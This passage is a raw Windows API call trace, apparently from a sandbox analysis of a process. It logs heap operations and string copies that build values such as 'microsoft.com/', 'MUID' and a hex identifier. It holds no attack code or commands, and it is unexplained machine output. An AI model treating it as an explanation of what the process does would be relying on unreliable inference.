0x61f5b0 [0181.339] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.339] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.339] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613aa0, Size=0x41) returned 0x6201e0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.340] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f520 [0181.340] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.340] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.340] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6201e0, Size=0x25) returned 0x613860 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.340] lstrlenA (lpString="/") returned 1 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.340] lstrcpyA (in: lpString1=0x61f520, lpString2="/" | out: lpString1="/") returned="/" [0181.340] lstrlenA (lpString="microsoft.com/") returned 14 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.340] lstrcpyA (in: lpString1=0x61f580, lpString2="microsoft.com/" | out: lpString1="microsoft.com/") returned="microsoft.com/" [0181.340] lstrlenA (lpString="microsoft.com/") returned 14 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f510 [0181.340] lstrcpyA (in: lpString1=0x61f510, lpString2="microsoft.com/" | out: lpString1="microsoft.com/") returned="microsoft.com/" [0181.340] GetProcessHeap () returned 0x5f0000 [0181.340] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f490 [0181.340] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.341] lstrlenA (lpString="microsoft.com/") returned 14 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f510 [0181.341] lstrcpyA (in: lpString1=0x61f510, lpString2="microsoft.com/" | out: lpString1="microsoft.com/") returned="microsoft.com/" [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f630 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.341] lstrlenA (lpString="||") returned 2 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f510 [0181.341] lstrcpyA (in: lpString1=0x61f510, lpString2="||" | out: lpString1="||") returned="||" [0181.341] lstrlenA (lpString="|") returned 1 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.341] lstrcpyA (in: lpString1=0x61f520, lpString2="|" | out: lpString1="|") returned="|" [0181.341] lstrlenA (lpString="1130274944") returned 10 [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f560 [0181.341] lstrcpyA (in: lpString1=0x61f560, lpString2="1130274944" | out: lpString1="1130274944") returned="1130274944" [0181.341] GetProcessHeap () returned 0x5f0000 [0181.341] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f640 [0181.342] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.342] StrToInt64ExA (in: pszString="1130274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.342] lstrlenA (lpString="30991936") returned 8 [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f580 [0181.342] lstrcpyA (in: lpString1=0x61f580, lpString2="30991936" | out: lpString1="30991936") returned="30991936" [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f660 [0181.342] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.342] StrToInt64ExA (in: pszString="30991936", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.342] lstrlenA (lpString="|") returned 1 [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5a0 [0181.342] lstrcpyA (in: lpString1=0x61f5a0, lpString2="|" | out: lpString1="|") returned="|" [0181.342] lstrlenA (lpString="1130274944") returned 10 [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f640 [0181.342] lstrcpyA (in: lpString1=0x61f640, lpString2="1130274944" | out: lpString1="1130274944") returned="1130274944" [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f4a0 [0181.342] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.342] GetProcessHeap () returned 0x5f0000 [0181.342] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.342] StrToInt64ExA (in: pszString="1130274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.342] lstrlenA (lpString="30991936") returned 8 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f4a0 [0181.343] lstrcpyA (in: lpString1=0x61f4a0, lpString2="30991936" | out: lpString1="30991936") returned="30991936" [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f5b0 [0181.343] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.343] StrToInt64ExA (in: pszString="30991936", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.343] lstrlenA (lpString="|") returned 1 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.343] lstrcpyA (in: lpString1=0x61f590, lpString2="|" | out: lpString1="|") returned="|" [0181.343] lstrlenA (lpString="|") returned 1 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f660 [0181.343] lstrcpyA (in: lpString1=0x61f660, lpString2="|" | out: lpString1="|") returned="|" [0181.343] lstrlenA (lpString="|") returned 1 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f530 [0181.343] lstrcpyA (in: lpString1=0x61f530, lpString2="|" | out: lpString1="|") returned="|" [0181.343] lstrlenA (lpString="|") returned 1 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f540 [0181.343] lstrcpyA (in: lpString1=0x61f540, lpString2="|" | out: lpString1="|") returned="|" [0181.343] lstrlenA (lpString="|") returned 1 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f670 [0181.343] lstrcpyA (in: lpString1=0x61f670, lpString2="|" | out: lpString1="|") returned="|" [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f5d0 [0181.343] GetProcessHeap () returned 0x5f0000 [0181.343] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f550 [0181.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.344] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5d0, Size=0x5) returned 0x61f480 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f550 [0181.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f550 [0181.344] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.344] GetProcessHeap () returned 0x5f0000 [0181.344] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.345] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f490, Size=0xb) returned 0x61f550 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f490 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f550 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.345] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.345] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f550, Size=0xb) returned 0x61f5b0 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f550 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.345] lstrlenA (lpString="392F526C06816A85186842D307536B22") returned 32 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x21) returned 0x613b90 [0181.345] lstrcpyA (in: lpString1=0x613b90, lpString2="392F526C06816A85186842D307536B22" | out: lpString1="392F526C06816A85186842D307536B22") returned="392F526C06816A85186842D307536B22" [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613740 [0181.345] GetProcessHeap () returned 0x5f0000 [0181.345] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.346] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.346] GetProcessHeap () returned 0x5f0000 [0181.346] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.346] GetProcessHeap () returned 0x5f0000 [0181.346] GetProcessHeap () returned 0x5f0000 [0181.346] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5b0 [0181.346] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.347] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613740, Size=0x2d) returned 0x613aa0 [0181.347] lstrlenA (lpString="MUID") returned 4 [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f5b0 [0181.347] lstrcpyA (in: lpString1=0x61f5b0, lpString2="MUID" | out: lpString1="MUID") returned="MUID" [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x61f5c0 [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.347] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] GetProcessHeap () returned 0x5f0000 [0181.347] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5d0 [0181.348] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.348] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5c0, Size=0x9) returned 0x61f5d0 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x6361e0 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.348] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.348] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.348] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6361e0, Size=0x15) returned 0x636100 [0181.348] lstrlenA (lpString="IE") returned 2 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f5c0 [0181.348] lstrcpyA (in: lpString1=0x61f5c0, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636140 [0181.348] GetProcessHeap () returned 0x5f0000 [0181.348] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f780 [0181.349] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f780 | out: hHeap=0x5f0000) returned 1 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f7d0 [0181.349] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7d0 | out: hHeap=0x5f0000) returned 1 [0181.349] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636140, Size=0x11) returned 0x636200 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636280 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636280, Size=0x23) returned 0x613ad0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x6361c0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6361c0, Size=0x27) returned 0x6139e0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6361c0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6361c0, Size=0x29) returned 0x613b00 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x6363a0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x51) returned 0x618050 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x29) returned 0x6138f0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.349] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6138f0, Size=0x53) returned 0x618bf0 [0181.349] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2a) returned 0x613b30 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b30, Size=0x63) returned 0x611f60 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x32) returned 0x635590 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635590, Size=0x65) returned 0x625d20 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635550 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635550, Size=0xbd) returned 0x621ac0 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5f) returned 0x618110 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618110, Size=0xbf) returned 0x621280 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x60) returned 0x6185f0 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6185f0, Size=0xd3) returned 0x625da0 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6a) returned 0x625040 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xd5) returned 0x6250c0 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6b) returned 0x625040 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xe9) returned 0x627350 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x75) returned 0x6251b0 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6251b0, Size=0xeb) returned 0x627450 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x76) returned 0x6251b0 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.350] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6251b0, Size=0xf3) returned 0x622b40 [0181.350] GetProcessHeap () returned 0x5f0000 [0181.351] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7a) returned 0x6251b0 [0181.351] GetProcessHeap () returned 0x5f0000 [0181.351] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6251b0, Size=0xf7) returned 0x623e40 [0181.351] GetProcessHeap () returned 0x5f0000 [0181.351] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f620, Size=0xf7) returned 0x622340 [0181.351] GetProcessHeap () returned 0x5f0000 [0181.351] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x623e40 | out: hHeap=0x5f0000) returned 1 [0181.351] GetProcessHeap () returned 0x5f0000 [0181.351] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x622b40 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627450 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6250c0 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625da0 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621280 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x621ac0 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d20 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618bf0 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618050 | out: hHeap=0x5f0000) returned 1 [0181.381] GetProcessHeap () returned 0x5f0000 [0181.381] HeapFree (in: 